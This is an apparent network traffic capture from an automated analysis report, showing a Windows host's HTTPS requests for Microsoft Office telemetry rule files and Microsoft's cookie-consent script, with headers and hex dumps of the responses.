                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:55 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:55 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                            x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141755Z-178bfbc474b9xljthC1NYCtw9400000001g000000000d72p
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            121192.168.2.64985313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:56 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                            x-ms-request-id: 8d0ecd0b-301e-0020-617e-3b6299000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141756Z-1777c6cb7549j9hhhC1TEBzmcc0000000b5g000000006vg4
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            122192.168.2.64985413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:56 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                            x-ms-request-id: 3a8ea751-101e-007a-417b-3b047e000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141756Z-178bfbc474bbcwv4hC1NYCypys00000001c000000000kfdh
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            123192.168.2.64985513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:56 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                            x-ms-request-id: b9d90d28-901e-00a0-5d63-3b6a6d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141756Z-178bfbc474bmqmgjhC1NYCy16c00000001hg00000000p1t5
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            124192.168.2.64985613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:56 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                            x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141756Z-178bfbc474bwlrhlhC1NYCy3kg00000001q0000000000xt3
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            125192.168.2.64985713.107.246.454433064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:56 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                            Host: wcpstatic.microsoft.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-21 14:17:57 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:56 GMT
                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                            Content-Length: 52717
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                            Age: 25942
                                                                                                                                                                                                            Cache-Control: max-age=43200
                                                                                                                                                                                                            Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                            Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                            Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                            x-ms-request-id: 09b6fa6f-101e-0038-42e3-3b8981000000
                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                            x-azure-ref: 20241121T141756Z-178bfbc474bxkclvhC1NYC69g400000001g000000000efep
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:57 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                            Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                            2024-11-21 14:17:57 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                            Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                            2024-11-21 14:17:57 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                            Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                                            2024-11-21 14:17:57 UTC4278INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                                                            Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            126192.168.2.64986013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:57 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:58 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                            x-ms-request-id: 46934538-601e-0050-507b-3b2c9c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141758Z-178bfbc474brk967hC1NYCfu6000000001fg000000000ttv
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:58 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            127192.168.2.64986113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:58 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:58 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1352
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                            x-ms-request-id: 64a4ee2c-301e-0099-6775-3b6683000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141758Z-178bfbc474bh5zbqhC1NYCkdug00000001cg00000000teyb
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
